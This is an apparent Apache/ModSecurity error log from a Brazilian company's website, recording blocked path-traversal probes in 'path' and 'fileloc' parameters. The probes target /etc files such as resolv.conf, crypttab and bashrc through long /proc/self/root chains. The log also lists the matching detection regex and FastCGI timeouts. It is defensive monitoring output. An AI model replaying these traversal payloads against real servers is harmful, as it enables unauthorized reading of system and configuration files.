[Tue Mar 17 21:14:36.990582 2026] [:error] [pid 6296:tid 140411666392832] [client 216.73.216.191:18542] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnubHIk7brgkOH-rIW1EgAAAUk"]
[Tue Mar 17 21:14:51.129828 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42980] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:14:52.331707 2026] [:error] [pid 25836:tid 140411708356352] [client 74.7.243.128:49976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnufIh-PF_25v4hFRCTpwAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:15:05.669178 2026] [mime_magic:error] [pid 6296:tid 140411599251200] (70014)End of file found: [client 74.7.243.128:43822] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/udev/hwdb.d
[Tue Mar 17 21:15:08.129492 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:36328] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnujNY0UrI5A3LftIwoHAAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:15:11.280897 2026] [:error] [pid 6296:tid 140411574073088] [client 74.7.241.31:47460] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnuj3Ik7brgkOH-rIW1HgAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:15:13.118023 2026] [proxy_fcgi:error] [pid 6296:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43512] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:15:14.767556 2026] [:error] [pid 11088:tid 140411565680384] [client 74.7.241.31:47474] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnukmmqtCojLHvu5cKRngAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:15:15.366355 2026] [:error] [pid 11088:tid 140411741927168] [client 74.7.243.128:41696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnuk2mqtCojLHvu5cKRnwAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:15:35.128839 2026] [proxy_fcgi:error] [pid 25836:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44080] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:15:36.318654 2026] [:error] [pid 29151:tid 140411590858496] [client 74.7.241.31:47490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnuqPPqhzTj3BvfDX-xeQAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:15:57.142367 2026] [proxy_fcgi:error] [pid 19507:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44584] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:16:19.129839 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:45114] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:16:25.296792 2026] [:error] [pid 25836:tid 140411649607424] [client 74.7.243.128:35886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnu2Yh-PF_25v4hFRCT3gAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:16:40.899554 2026] [:error] [pid 25836:tid 140411658000128] [client 74.7.243.128:35886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnu6Ih-PF_25v4hFRCT5wAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:16:41.129901 2026] [proxy_fcgi:error] [pid 11088:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45722] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:16:49.229145 2026] [:error] [pid 6296:tid 140411624429312] [client 216.73.216.191:11900] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnu8XIk7brgkOH-rIW1agAAAU4"]
[Tue Mar 17 21:17:02.142612 2026] [proxy_fcgi:error] [pid 11816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46254] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:17:08.122658 2026] [:error] [pid 6296:tid 140411649607424] [client 74.7.243.128:45076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvBHIk7brgkOH-rIW1hAAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:17:11.684451 2026] [:error] [pid 11088:tid 140411599251200] [client 74.7.243.128:51032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvB2mqtCojLHvu5cKR0QAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:17:25.145793 2026] [proxy_fcgi:error] [pid 6296:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46804] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:17:47.133798 2026] [proxy_fcgi:error] [pid 25836:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47316] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:17:50.886475 2026] [:error] [pid 6296:tid 140411616036608] [client 74.7.241.31:48916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvLnIk7brgkOH-rIW1oAAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:18:09.169771 2026] [proxy_fcgi:error] [pid 29151:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47820] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:18:14.315731 2026] [:error] [pid 6296:tid 140411607643904] [client 74.7.241.31:48916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvRnIk7brgkOH-rIW1rgAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:18:22.266763 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.244.43:41978] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnvTuyqAr6etmhZHNpP_AAAAFY"]
[Tue Mar 17 21:18:27.907230 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.228.61:36562] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnvU9Y0UrI5A3LftIwocgAAAZU"]
[Tue Mar 17 21:18:32.133793 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:48362] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:18:54.129783 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48996] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:18:58.535618 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:49072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvcta6ubjKNq_cu4Yv5gAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:19:00.243043 2026] [:error] [pid 2598:tid 140411666392832] [client 74.7.241.31:60280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvdBj0p0SRWAqcjGGikAAAAwk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:19:15.130659 2026] [proxy_fcgi:error] [pid 29151:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:49674] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:19:20.991647 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.241.31:60292] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnviOw_le52K8_3pV11uQAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:19:22.419092 2026] [:error] [pid 6296:tid 140411624429312] [client 216.73.216.191:57338] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvinIk7brgkOH-rIW15QAAAU4"]
[Tue Mar 17 21:19:22.756697 2026] [:error] [pid 11088:tid 140411641214720] [client 74.7.241.31:33314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvimmqtCojLHvu5cKSFAAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:19:24.967365 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:33318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvjNY0UrI5A3LftIwoiwAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
